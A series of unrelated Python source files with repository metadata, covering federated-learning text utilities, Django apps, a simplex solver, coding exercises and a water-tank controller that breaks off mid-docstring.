| 2020-04-03T15:33:27
| 2020-04-03T15:33:27
| 242,638,655
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,412
|
py
|
# Modified from: https://github.com/litian96/FedProx/blob/master/flearn/utils/language_utils.py
# credit goes to: Tian Li (litian96 @ GitHub)
"""Utils for language models."""
import re
# ------------------------
# utils for shakespeare dataset
ALL_LETTERS = "\n !\"&'(),-.0123456789:;>?ABCDEFGHIJKLMNOPQRSTUVWXYZ[]abcdefghijklmnopqrstuvwxyz}"
NUM_LETTERS = len(ALL_LETTERS)
def _one_hot(index, size):
'''returns one-hot vector with given size and value 1 at given index
'''
vec = [0 for _ in range(size)]
vec[int(index)] = 1
return vec
def letter_to_vec(letter):
'''returns one-hot representation of given letter
'''
index = ALL_LETTERS.find(letter)
return _one_hot(index, NUM_LETTERS)
def word_to_indices(word):
'''returns a list of character indices
Args:
word: string
Return:
indices: int list with length len(word)
'''
indices = []
for c in word:
indices.append(ALL_LETTERS.find(c))
return indices
# ------------------------
# utils for sent140 dataset
def split_line(line):
'''split given line/phrase into list of words
Args:
line: string representing phrase to be split
Return:
list of strings, with each string representing a word
'''
return re.findall(r"[\w']+|[.,!?;]", line)
def _word_to_index(word, indd):
'''returns index of given word based on given lookup dictionary
returns the length of the lookup dictionary if word not found
Args:
word: string
indd: dictionary with string words as keys and int indices as values
'''
if word in indd:
return indd[word]
else:
return len(indd)
def line_to_indices(line, word2id, max_words=25):
'''converts given phrase into list of word indices
if the phrase has more than max_words words, returns a list containing
indices of the first max_words words
if the phrase has less than max_words words, repeatedly appends integer
representing unknown index to returned list until the list's length is
max_words
Args:
line: string representing phrase/sequence of words
word2id: dictionary with string words as keys and int indices as values
max_words: maximum number of word indices in returned list
Return:
indl: list of word indices, one index for each word in phrase
'''
unk_id = len(word2id)
line_list = split_line(line) # split phrase in words
indl = [word2id[w] if w in word2id else unk_id for w in line_list[:max_words]]
indl += [unk_id]*(max_words-len(indl))
return indl
def bag_of_words(line, vocab):
'''returns bag of words representation of given phrase using given vocab
Args:
line: string representing phrase to be parsed
vocab: dictionary with words as keys and indices as values
Return:
integer list
'''
bag = [0]*len(vocab)
words = split_line(line)
for w in words:
if w in vocab:
bag[vocab[w]] += 1
return bag
def repackage_hidden(h):
"""Wraps hidden states in new Tensors, to detach them from their history."""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
def process_x(raw_x_batch):
x_batch = [word_to_indices(word) for word in raw_x_batch]
x_batch = np.array(x_batch).T
return x_batch
def process_y(raw_y_batch):
y_batch = [letter_to_vec(c) for c in raw_y_batch]
return np.array(y_batch)
def patch_h_weights(weights, L_next, assignments):
# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256)
def __permutate(weight, assignments, L_next):
new_w_j = np.zeros((L_next, L_next), dtype=np.float32)
new_w_j[np.ix_(assignments, assignments)] = weight # TODO(hwang): make sure if this is correct
return new_w_j
split_range = np.split(np.arange(weights.shape[0]), 4)
h_weights = []
for indices in split_range:
#logger.info("assignments: {}".format(assignments))
tempt_h_w = __permutate(weights[indices, :], assignments, L_next)
h_weights.append(tempt_h_w)
#logger.info("equal: {}".format(np.array_equal(tempt_h_w, weights[indices, :])))
return np.vstack(h_weights)
def patch_biases(biases, L_next, assignments):
# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256)
def __permutate(bias, assignments, L_next):
new_w_j = np.zeros(L_next)
new_w_j[assignments] = bias
return new_w_j
splitted_bias = np.split(biases, 4)
h_bias = [__permutate(sb, assignments, L_next) for sb in splitted_bias]
return np.hstack(h_bias)
def perm_i_weights(w_j, L_next, assignment_j_c):
split_range = np.split(np.arange(w_j.shape[0]), 4)
res = []
for i in range(4):
cand_w_j = w_j[split_range[i], :]
temp_new_w_j = np.zeros((L_next, w_j.shape[1]))
temp_new_w_j[assignment_j_c, :] = cand_w_j
res.append(temp_new_w_j)
return np.vstack(res)
def patch_i_weights(weights, L_next, assignments):
# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256)
def __permutate(weight, assignments, L_next):
new_w_j = np.zeros((L_next, L_next), dtype=np.float32)
new_w_j[np.ix_(assignments, assignments)] = weight # TODO(hwang): make sure if this is correct
return new_w_j
split_range = np.split(np.arange(weights.shape[0]), 4)
h_weights = [__permutate(weights[indices, :], assignments, L_next) for indices in split_range]
return np.hstack(h_weights).T
def patch_i_biases(biases, L_next, assignments):
# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256)
def __permutate(bias, assignments, L_next):
new_w_j = np.zeros(L_next, dtype=np.float32)
new_w_j[assignments] = bias
return new_w_j
splitted_bias = np.split(biases, 4)
h_bias = [__permutate(sb, assignments, L_next) for sb in splitted_bias]
return np.hstack(h_bias)
def perm_i_weights(w_j, L_next, assignment_j_c):
split_range = np.split(np.arange(w_j.shape[0]), 4)
res = []
for i in range(4):
cand_w_j = w_j[split_range[i], :]
temp_new_w_j = np.zeros((L_next, w_j.shape[1]))
temp_new_w_j[assignment_j_c, :] = cand_w_j
res.append(temp_new_w_j)
return np.vstack(res)
|
[
"hongyiwang@cs.wisc.edu"
] |
hongyiwang@cs.wisc.edu
|
32ac5a7d72b76f113a77fc4d6eca2a230f2d9f1a
|
bd6fd6bb82bf3179a4571c7a2ca3a030f5684c5c
|
/mundo3-EstruturasCompostas/096-funcaoQueCalculaArea.py
|
a37552e17727565abb68b53d43e8027d78f1f497
|
[
"MIT"
] |
permissive
|
jonasht/CursoEmVideo-CursoDePython3
|
b3e70cea1df9f33f409c4c680761abe5e7b9e739
|
a1bbf1fe4226b1828213742ee5a440278d903fd1
|
refs/heads/master
| 2023-08-27T12:12:38.103023
| 2021-10-29T19:05:01
| 2021-10-29T19:05:01
| 276,724,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 315
|
py
|
def calcularArea(largura, comprimento):
return largura * comprimento
print('=-'*30+'=')
largura = float(input('qual é a largura: '))
comprimento = float(input('qual é o comprimento: '))
resposta = calcularArea(largura, comprimento)
print(f'a area do terreno {largura}X{comprimento} é de {resposta}m²')
|
[
"jhenriquet@outlook.com.br"
] |
jhenriquet@outlook.com.br
|
a7be00b6b8cb3f71f680f3dd9f899fc55ee28faf
|
40b6aa99da5b96a382a04b818b558b66c47f5a96
|
/projects/serializers.py
|
070927afeb267f7413d593453aa2dd3a1c9d1dec
|
[
"BSD-3-Clause"
] |
permissive
|
LABETE/TestYourProject
|
8bba87004227005edf6b7e9cfb1b3e496441bc7b
|
416d5e7993343e42f031e48f4d78e5332d698519
|
refs/heads/master
| 2021-01-10T18:47:29.581371
| 2015-09-03T16:48:05
| 2015-09-03T16:48:05
| 37,154,071
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
from rest_framework import serializers
from .models import Project
class ProjectSerializer(serializers.ModelSerializer):
"""ProjectSerializer use the Project Model"""
class Meta:
model = Project
# Fields displayed on the rest api for projects
fields = (
"id", "name", "owner", "description",
"start_date", "end_date", "created", "modified",
"co_owners", "status",)
|
[
"eddie.valv@gmail.com"
] |
eddie.valv@gmail.com
|
dc228204221f9999a303f9408c676717036ef6e4
|
54934cfe32ce5aa5c2e718b0c5c2afa4b458fe75
|
/29ch/simplex.py
|
59b4470baf756d0125074792e5d87eb8135a1b62
|
[] |
no_license
|
mccarvik/intro_to_algorithms
|
46d0ecd20cc93445e0073eb0041d481a29322e82
|
c2d41706150d2bb477220b6f929510c4fc4ba30b
|
refs/heads/master
| 2021-04-12T12:25:14.083434
| 2019-11-09T05:26:28
| 2019-11-09T05:26:28
| 94,552,252
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,014
|
py
|
import numpy as np
from fractions import Fraction # so that numbers are not displayed in decimal.
print("\n ****SiMplex Algorithm ****\n\n")
# inputs
# A will contain the coefficients of the constraints
A = np.array([[1, 1, 0, 1], [2, 1, 1, 0]])
# b will contain the amount of resources
b = np.array([8, 10])
# c will contain coefficients of objective function Z
c = np.array([1, 1, 0, 0])
# B will contain the basic variables that make identity matrix
cb = np.array(c[3])
B = np.array([[3], [2]])
# cb contains their corresponding coefficients in Z
cb = np.vstack((cb, c[2]))
xb = np.transpose([b])
# combine matrices B and cb
table = np.hstack((B, cb))
table = np.hstack((table, xb))
# combine matrices B, cb and xb
# finally combine matrix A to form the complete simplex table
table = np.hstack((table, A))
# change the type of table to float
table = np.array(table, dtype ='float')
# inputs end
# if min problem, make this var 1
MIN = 0
print("Table at itr = 0")
print("B \tCB \tXB \ty1 \ty2 \ty3 \ty4")
for row in table:
for el in row:
# limit the denominator under 100
print(Fraction(str(el)).limit_denominator(100), end ='\t')
print()
print()
print("Simplex Working....")
# when optimality reached it will be made 1
reached = 0
itr = 1
unbounded = 0
alternate = 0
while reached == 0:
print("Iteration: ", end =' ')
print(itr)
print("B \tCB \tXB \ty1 \ty2 \ty3 \ty4")
for row in table:
for el in row:
print(Fraction(str(el)).limit_denominator(100), end ='\t')
print()
# calculate Relative profits-> cj - zj for non-basics
i = 0
rel_prof = []
while i<len(A[0]):
rel_prof.append(c[i] - np.sum(table[:, 1]*table[:, 3 + i]))
i = i + 1
print("rel profit: ", end =" ")
for profit in rel_prof:
print(Fraction(str(profit)).limit_denominator(100), end =", ")
print()
i = 0
b_var = table[:, 0]
# checking for alternate solution
while i<len(A[0]):
j = 0
present = 0
while j<len(b_var):
if int(b_var[j]) == i:
present = 1
break;
j+= 1
if present == 0:
if rel_prof[i] == 0:
alternate = 1
print("Case of Alternate found")
# print(i, end =" ")
i+= 1
print()
flag = 0
for profit in rel_prof:
if profit>0:
flag = 1
break
# if all relative profits <= 0
if flag == 0:
print("All profits are <= 0, optimality reached")
reached = 1
break
# kth var will enter the basis
k = rel_prof.index(max(rel_prof))
min = 99999
i = 0;
r = -1
# min ratio test (only positive values)
while i<len(table):
if (table[:, 2][i]>0 and table[:, 3 + k][i]>0):
val = table[:, 2][i]/table[:, 3 + k][i]
if val<min:
min = val
r = i # leaving variable
i+= 1
# if no min ratio test was performed
if r ==-1:
unbounded = 1
print("Case of Unbounded")
break
print("pivot element index:", end =' ')
print(np.array([r, 3 + k]))
pivot = table[r][3 + k]
print("pivot element: ", end =" ")
print(Fraction(pivot).limit_denominator(100))
# perform row operations
# divide the pivot row with the pivot element
table[r, 2:len(table[0])] = table[
r, 2:len(table[0])] / pivot
# do row operation on other rows
i = 0
while i<len(table):
if i != r:
table[i, 2:len(table[0])] = table[i, 2:len(table[0])] - table[i][3 + k] * table[r, 2:len(table[0])]
i += 1
# assign the new basic variable
table[r][0] = k
table[r][1] = c[r]
print()
print()
itr+= 1
print()
print("***************************************************************")
if unbounded == 1:
print("UNBOUNDED LPP")
exit()
if alternate == 1:
print("ALTERNATE Solution")
print("optimal table:")
print("B \tCB \tXB \ty1 \ty2 \ty3 \ty4")
for row in table:
for el in row:
print(Fraction(str(el)).limit_denominator(100), end ='\t')
print()
print()
print("value of Z at optimality: ", end =" ")
basis = []
i = 0
sum = 0
while i<len(table):
sum += c[int(table[i][0])]*table[i][2]
temp = "x"+str(int(table[i][0])+1)
basis.append(temp)
i+= 1
# if MIN problem make z negative
if MIN == 1:
print(-Fraction(str(sum)).limit_denominator(100))
else:
print(Fraction(str(sum)).limit_denominator(100))
print("Final Basis: ", end =" ")
print(basis)
print("Simplex Finished...")
print()
|
[
"ec2-user@ip-172-31-91-31.ec2.internal"
] |
ec2-user@ip-172-31-91-31.ec2.internal
|
c16d82720ec1b8fe3e203367af944e196afff6e1
|
a829617f9ad158df80a569dd02a99c53639fa2c6
|
/test/hep/hist/plotscatter1.py
|
481bd4af3c75beb1b29ae31a8343f51318ba9f68
|
[] |
no_license
|
alexhsamuel/pyhep
|
6db5edd03522553c54c8745a0e7fe98d96d2b7ae
|
c685756e9065a230e2e84c311a1c89239c5d94de
|
refs/heads/master
| 2021-01-10T14:24:08.648081
| 2015-10-22T13:18:50
| 2015-10-22T13:18:50
| 44,745,881
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,188
|
py
|
#-----------------------------------------------------------------------
# imports
#-----------------------------------------------------------------------
from hep.draw import *
import hep.draw.postscript
import hep.draw.xwindow
import hep.hist
import hep.hist.plot
from random import random
import sys
#-----------------------------------------------------------------------
# tests
#-----------------------------------------------------------------------
scatter = hep.hist.Scatter((float, "mass", "GeV/$c^2$"),
(float, "momentum", "GeV/$c$"))
for i in range(200):
x = random() * 2
y = random() + random() + random() + random() - 2
scatter << (x, y)
layout = GridLayout(2, 1, aspect=1)
plot = hep.hist.plot.Plot(2, overflows=False,
marker="*", marker_size=5 * point)
plot.append(scatter)
layout[0, 0] = plot
plot = hep.hist.plot.Plot(2)
plot.append(scatter, overflows=True, x_range=(0, 1.8), y_range=(-1, 1))
layout[1, 0] = plot
hep.draw.postscript.PSFile("plotscatter1.ps").render(layout)
window = hep.draw.xwindow.FigureWindow(layout, (0.23, 0.1))
if len(sys.argv) > 1:
raw_input("hit enter to end: ")
|
[
"alex@alexsamuel.net"
] |
alex@alexsamuel.net
|
d2823e6997c2111264e3da0f80476e590dfddc56
|
14744766d01d6719097fa6d2b0a9db42226c114b
|
/mysite/mysite/urls.py
|
2700207fc7d9c265b503210e668e09142c8f1569
|
[] |
no_license
|
jakiiii/Django-2-by-Example
|
8f491a23b7c45ef71a866622ec45dab9909ad212
|
6b3c68b7d54b6c763bba30be5c8b48d257cd97f5
|
refs/heads/master
| 2023-03-10T00:09:37.688697
| 2021-02-26T19:27:24
| 2021-02-26T19:27:24
| 342,679,630
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.sitemaps.views import sitemap
from blog.sitemaps import PostSitemap
sitemaps = {
'posts': PostSitemap
}
urlpatterns = [
path('admin/', admin.site.urls),
path('blog/', include('blog.urls')),
# path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap')
]
|
[
"me.jaki@outlook.com"
] |
me.jaki@outlook.com
|
90f95244f05c1263c0d096e6db8ca9eb041850be
|
3ee0c019a7b10a7a78dfc07d61da5d2b3cf3ad27
|
/190808/10815_num_card.py
|
b0e15f15f74903dcf0fac31456922a98aaf35c0b
|
[] |
no_license
|
JiminLee411/algorithms
|
a32ebc9bb2ba4f68e7f80400a7bc26fd1c3a39c7
|
235834d1a50d5054f064bc248a066cb51c0835f5
|
refs/heads/master
| 2020-06-27T01:37:55.390510
| 2019-11-14T08:57:16
| 2019-11-14T08:57:16
| 199,811,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
import sys
sys.stdin = open('10815_input.txt', 'r')
M = int(input())
my = list(map(int, input().split()))
N = int(input())
value = list(map(int, input().split()))
comp = ['0' for _ in range(N)]
for i in range(N):
if value[i] in my:
comp[i] = '1'
res = ' '.join(comp)
print(res)
|
[
"wlals41189@gmail.com"
] |
wlals41189@gmail.com
|
775de92b67b22c79f8edaac2f60a42285e0b6576
|
f942f82fb1b9c2eb0c4cf03ca2254f4207fd08d2
|
/Products/urls.py
|
b5a99b7be68470e2ae719e7f66d3f28dde8ef522
|
[] |
no_license
|
mahdy-world/Fatoma-Restaurant
|
2b6aec149c20d5526d5d7a505479cc29c811d666
|
a500397741e72d0cf28dbb8f64c914144835d6c2
|
refs/heads/master
| 2023-06-27T19:27:35.606292
| 2021-07-31T13:53:18
| 2021-07-31T13:53:18
| 391,366,717
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,985
|
py
|
from .views import *
from django.urls import path
app_name = 'Products'
urlpatterns = [
path('main_categories/', MainCategoryList.as_view(), name='MainCategoryList'),
path('main_categories/new/', MainCategoryCreate.as_view(), name='MainCategoryCreate'),
path('main_categories/trash/', MainCategoryTrashList.as_view(), name='MainCategoryTrashList'),
path('main_categories/<int:pk>/edit/', MainCategoryUpdate.as_view(), name='MainCategoryUpdate'),
path('main_categories/<int:pk>/delete/', MainCategoryDelete.as_view(), name='MainCategoryDelete'),
path('main_categories/xls', MainCategoryXls , name='MainCategoryXls'),
path('sub_categories/', SubCategoryList.as_view(), name='SubCategoryList'),
path('sub_categories/new/', SubCategoryCreate.as_view(), name='SubCategoryCreate'),
path('sub_categories/trash/', SubCategoryTrashList.as_view(), name='SubCategoryTrashList'),
path('sub_categories/<int:pk>/edit/', SubCategoryUpdate.as_view(), name='SubCategoryUpdate'),
path('sub_categories/<int:pk>/delete/', SubCategoryDelete.as_view(), name='SubCategoryDelete'),
path('sub_categories/xls', SubCategoryXls , name='SubCategoryXls'),
path('manufactures/', ManufactureList.as_view(), name='ManufactureList'),
path('manufactures/new/', ManufactureCreate.as_view(), name='ManufactureCreate'),
path('manufactures/trash/', ManufactureTrashList.as_view(), name='ManufactureTrashList'),
path('manufactures/<int:pk>/edit/', ManufactureUpdate.as_view(), name='ManufactureUpdate'),
path('manufactures/<int:pk>/delete/', ManufactureDelete.as_view(), name='ManufactureDelete'),
path('manufactures/xls', ManufactureXls , name='ManufactureXls'),
path('brands/', BrandList.as_view(), name='BrandList'),
path('brands/new/', BrandCreate.as_view(), name='BrandCreate'),
path('brands/trash/', BrandTrashList.as_view(), name='BrandTrashList'),
path('brands/<int:pk>/edit/', BrandUpdate.as_view(), name='BrandUpdate'),
path('brands/<int:pk>/delete/', BrandDelete.as_view(), name='BrandDelete'),
path('brands/xls', BrandXls , name='BrandXls'),
path('units/', UnitList.as_view(), name='UnitList'),
path('units/new/', UnitCreate.as_view(), name='UnitCreate'),
path('units/<int:pk>/edit/', UnitUpdate.as_view(), name='UnitUpdate'),
path('units/<int:pk>/delete/', UnitDelete.as_view(), name='UnitDelete'),
path('products/', ProductList.as_view(), name='ProductList'),
path('products/new/', ProductCreate.as_view(), name='ProductCreate'),
path('products/trash/', ProductTrashList.as_view(), name='ProductTrashList'),
path('products/<int:pk>/edit/', ProductUpdate.as_view(), name='ProductUpdate'),
path('products/<int:pk>/delete/', ProductDelete.as_view(), name='ProductDelete'),
path('products/<int:pk>/show/', ProductCard.as_view(), name='ProductCard'),
path('products/<int:pk>/add_content/', GroupedProductCreate.as_view(), name='GroupedProductCreate'),
path('product/xls', ProductXls, name='ProductXls'),
path('grouped_product/<int:pk>/edit/', GroupedProductUpdate.as_view(), name='GroupedProductUpdate'),
path('grouped_product/<int:pk>/delete/', GroupedProductDelete, name='GroupedProductDelete'),
path('taxes/', TaxesList.as_view(), name='TaxesList'),
path('tax/new/', TaxCreate.as_view(), name='TaxCreate'),
path('tax/<int:pk>/edit/', TaxUpdate.as_view(), name='TaxUpdate'),
path('tax/delete/<int:id>/', TaxDelete , name='TaxDelete'),
path('tax/xls', TaxXls , name='TaxXls'),
path('prices_product/<int:pk>/<int:ppk>/edit/', PricesProductUpdate.as_view(), name='PricesProductUpdate'),
path('prices_product/<int:pk>/<int:ppk>/delete/', PricesProductDelete.as_view(), name='PricesProductDelete'),
path('prices_product/<int:pk>/<int:ppk>/stop/', PricesProductStop.as_view(), name='PricesProductStop'),
path('prices_product/<int:pk>/<int:ppk>/active/', PricesProductActive.as_view(), name='PricesProductActive'),
]
|
[
"salmazidan1997@gmail.com"
] |
salmazidan1997@gmail.com
|
9f8ce2a8babfebf2df4043994027fbb07c66730e
|
303d61b95651407951af11224df32a6b2c54ee0a
|
/medium/Next_Permutation.py
|
fc77b475ef0b932927fcfe83d9ff98e16b4db50f
|
[] |
no_license
|
junghyun4425/myleetcode
|
6e621e8f1641fb8e55fe7063b563d0cec20373a6
|
f0ad1e671de99574e00b4e78391d001677d60d82
|
refs/heads/master
| 2023-07-22T12:27:23.487909
| 2021-08-24T10:01:49
| 2021-08-24T10:01:49
| 317,727,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
# Problem Link: https://leetcode.com/problems/next-permutation/
'''
문제 요약: 순열 다음에 나올 순서의 조합을 완성하는 문제.
ask: [4,5,3,2,1]
answer: [5,1,2,3,4]
해석:
순열이 만들어지는 내부 알고리즘을 정확히 파악할 수 있는가에 대한 문제. 이부분을 모른다면 난이도는 hard라 볼수 있음. (구현 자체는 어려움이 없으므로)
우선 처음 찾은 규칙이 다른 예제에서는 들어맞지 않아서 실패. 나름 정답과 근접했다고 생각했으나 정답까지 도달하지 못해 순열의 원리를 인터넷에서 공부.
우측에서 부터 나아가 값이 떨어지는 부분을 찾은 다음, 그 값과 가장 근접한 큰 수를 오른쪽을 향해 찾고 그 값으로 바꿔야함.
그리고 그 나머지 뒤에 숫자들의 순서를 뒤집으면 다음의 순열이 완성.
수학적 센스가 부족해서 혼자힘으로 못풀은 느낌이기에 이런 문제들을 더 많이 접해보고 공부해야 함.
'''
class Solution:
def nextPermutation(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
def swap(i, j):
tmp = nums[i]
nums[i] = nums[j]
nums[j] = tmp
n_len = len(nums)
dec, inc = -1, -1
for i in range(n_len - 1, 0, -1):
if nums[i - 1] < nums[i]:
dec = i - 1
break
for i in range(dec + 1, n_len):
if nums[dec] >= nums[i]:
inc = i - 1
break
if dec < 0:
nums.sort()
else:
swap(dec, inc)
for i in range((n_len - (dec + 1)) // 2):
swap(dec + 1 + i, -1 - i)
|
[
"junghyun153@naver.com"
] |
junghyun153@naver.com
|
fd5344b926e350d8600958ffe81b5cb0bb28003e
|
942ee5e8d54e8ebe9c5c841fbfdd1da652946944
|
/2001-2500/2047.Number of Valid Words in a Sentence.py
|
61409d08dd04438bf07ff937138d7d7ef84c61dc
|
[] |
no_license
|
kaiwensun/leetcode
|
0129c174457f32887fbca078fb448adce46dd89d
|
6b607f4aae3a4603e61f2e2b7480fdfba1d9b947
|
refs/heads/master
| 2023-08-31T07:30:50.459062
| 2023-08-27T07:59:16
| 2023-08-27T07:59:16
| 57,526,914
| 69
| 9
| null | 2023-08-20T06:34:41
| 2016-05-01T05:37:29
|
Python
|
UTF-8
|
Python
| false
| false
| 751
|
py
|
class Solution:
def countValidWords(self, sentence: str) -> int:
res = 0
def test(word):
if word[-1].isdigit() or word[-1] == '-':
return False
for i, c in enumerate(word[:-1]):
if not ('a' <= c <= 'z' or c == '-'):
return False
hyphon = word.find('-')
if hyphon != -1:
if word.count('-') > 1:
return False
if hyphon == 0 or hyphon == len(word) - 1:
return False
if word[-1] in '!,.':
if len(word) > 1 and word[-2] == '-':
return False
return True
return sum(map(test, sentence.split()))
|
[
"skw_kevin@126.com"
] |
skw_kevin@126.com
|
18478bb44f33657f03bdf040d15e4e64e04aa750
|
5aca02672a97255956edb21f50de2854e62f6210
|
/Projeto/carrinho.py
|
3093c1f02058d6a763d8a19d4d1561b9eeec646f
|
[] |
no_license
|
Pedro-H-Castoldi/descobrindo_Python
|
ea54a75e577a85fdc1e7284643447fadd950ba6e
|
287290c6ee8b34142d5e7c27cdc7b2edebf23819
|
refs/heads/master
| 2020-09-04T17:39:11.514124
| 2020-04-27T15:55:15
| 2020-04-27T15:55:15
| 219,834,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,395
|
py
|
import cliente
from produto import Produto
from compra import Compra
class Carrinho:
def __init__(self):
self.__l_carrinho = []
@property
def l_carrinho(self):
return self.__l_carrinho
@property
def cliente(self):
return self.__cliente
def conferir_cliente(self):
c_cliente = str(input('Insira o nome completo do cliente: ')).title()
c_cliente = cliente.Cliente.cliente_dados(c_cliente)
if c_cliente:
self.__cliente = c_cliente
self.encher_carrinho()
def encher_carrinho(self):
self.__l_carrinho.clear()
while True:
c_produto = str(input('Insira o nome do produto: ')).title()
c_produto = Produto.produto_dados(c_produto)
Produto.ver_estoque(c_produto)
if c_produto:
if c_produto.estoque:
while True:
cont = 0
quant = int(input(f'Quantidade de {c_produto.nome} X {c_produto.quant} : '))
if quant > 0 and c_produto.quant >= quant:
while cont < quant:
cont += 1
self.l_carrinho.append(c_produto)
break
elif quant <= 0:
print('Insira uma quantidade válida.')
else:
print(f'A quantidade pedida é maior que a quantidade em estoque.')
print(f'O produto {c_produto.nome} tem em estoque {c_produto.quant} unidade(s).')
op = int(input(f'1- Tentar novamente | 0- Cancelar: '))
if op != 1:
break
else:
print('Produto faltando.')
if not self.l_carrinho:
op = int(input('1- Continuar comprando | 0- Sair: '))
if op == 0:
break
else:
op = int(input('1- Continuar Comprando | 2- Ir para o Caixa | 0- Desfazer Carrinho: '))
if op == 2:
comprar = Compra(self)
comprar.comprar()
break
elif op == 0:
self.l_carrinho.clear()
break
|
[
"pedrohenriquecastoldi.b@hotmail.com"
] |
pedrohenriquecastoldi.b@hotmail.com
|
06e79f4fad2a731cc1739d26a7409b37dde32769
|
ee974d693ca4c4156121f8cb385328b52eaac07c
|
/env/share/doc/networkx-2.3/examples/graph/plot_erdos_renyi.py
|
fac52504b6282d6fbd3e5053ad050c7eb81c27b2
|
[
"BSD-3-Clause"
] |
permissive
|
ngonhi/Attendance_Check_System_with_Face_Recognition
|
f4531cc4dee565d0e45c02217f73f3eda412b414
|
92ff88cbc0c740ad48e149033efd38137c9be88d
|
refs/heads/main
| 2023-03-12T07:03:25.302649
| 2021-02-26T15:37:33
| 2021-02-26T15:37:33
| 341,493,686
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:52554e74245d7822f751aeac81b4fc199ee16f088cc89c0e0df4143f9aa34b7c
size 973
|
[
"Nqk180998!"
] |
Nqk180998!
|
606c5dd07fdcaf37ce7afc906c9394115452de74
|
58f38f1d69d4bfc650ad18e0045c36ae29c9d84a
|
/Django基础部分代码/chapter04/orm_intro_demo/book/models.py
|
f9d8ccf147cc08f68a92fa89d2d320b01ccbd649
|
[] |
no_license
|
zjf201811/DjangoWebProject
|
0670c61b89387901089bf67cf2423d9341f69913
|
fab15784fb326ba4517951e180418ea54de03afe
|
refs/heads/master
| 2020-04-18T12:03:08.798484
| 2019-05-06T03:59:46
| 2019-05-06T03:59:46
| 167,522,193
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 927
|
py
|
from django.db import models
# 如果要将一个普通的类变成一个可以映射到数据库中的ORM模型
# 那么必须要将父类设置为models.Model或者他的子类
class Book(models.Model):
# 1. id:int类型,是自增长的。
id = models.AutoField(primary_key=True)
# 2. name:varchar(100),图书的名字
name = models.CharField(max_length=100,null=False)
# 3. author:varchar(100),图书的作者
author = models.CharField(max_length=100,null=False)
# 4. price:float,图书的价格
price = models.FloatField(null=False,default=0)
class Publisher(models.Model):
name = models.CharField(max_length=100,null=False)
address = models.CharField(max_length=100,null=False)
# 1. 使用makemigrations生成迁移脚本文件
# python manage.py makemigrations
# 2. 使用migrate将新生成的迁移脚本文件映射到数据库中
# python manage.py migrate
|
[
"thor201105@163.com"
] |
thor201105@163.com
|
7fcbc5d0f076d7dc308177281f13613842aee435
|
3d91b4f3ac42056b1a8205b1f5a62b5ca05ded43
|
/expences_tracker/expences_tracker/asgi.py
|
493e3e68aa4b22d3960adb960d7b5cb825e3e1da
|
[] |
no_license
|
olgayordanova/Python_Web
|
be34027a7755d5c178164995edb25f173a7fcdb4
|
3dfc6df65bffb109d5e26e9d1a496158b196c62f
|
refs/heads/main
| 2023-05-31T03:54:29.515864
| 2021-07-09T11:29:14
| 2021-07-09T11:29:14
| 373,501,975
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
"""
ASGI config for expences_tracker project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'expences_tracker.settings')
application = get_asgi_application()
|
[
"noreply@github.com"
] |
olgayordanova.noreply@github.com
|
0577c21f81b162c1e5ff6065204cee92f06948df
|
2626f6e6803c8c4341d01f57228a0fe117e3680b
|
/students/rmart300/lesson06_testing/water-regulation/decider.py
|
2eb9b68c36c9f1fdd19733e2dd733124b51d7852
|
[] |
no_license
|
kmsnyde/SP_Online_Course2_2018
|
9e59362da253cdec558e1c2f39221c174d6216f3
|
7fe8635b47d4792a8575e589797260ad0a2b027e
|
refs/heads/master
| 2020-03-19T17:15:03.945523
| 2018-09-05T22:28:55
| 2018-09-05T22:28:55
| 136,750,231
| 0
| 0
| null | 2018-06-09T19:01:52
| 2018-06-09T19:01:51
| null |
UTF-8
|
Python
| false
| false
| 3,167
|
py
|
"""
Encapsulates decision making in the water-regulation module
"""
class Decider(object):
"""
Encapsulates decision making in the water-regulation module
"""
def __init__(self, target_height, margin):
"""
Create a new decider instance for this tank.
:param target_height: the target height for liquid in this tank
:param margin: the margin of liquid above and below the target height for
which the pump should not turn on. Ex: .05 represents a
5% margin above and below the target_height.
"""
self.target_height = target_height
self.margin = margin
def decide(self, current_height, current_action, actions):
"""
Decide a new action for the pump, given the current height of liquid in the
tank and the current action of the pump.
Note that the new action for the pump MAY be the same as the current action
of the pump.
The *decide* method shall obey the following behaviors:
1. If the pump is off and the height is below the margin region, then the
pump should be turned to PUMP_IN.
2. If the pump is off and the height is above the margin region, then the
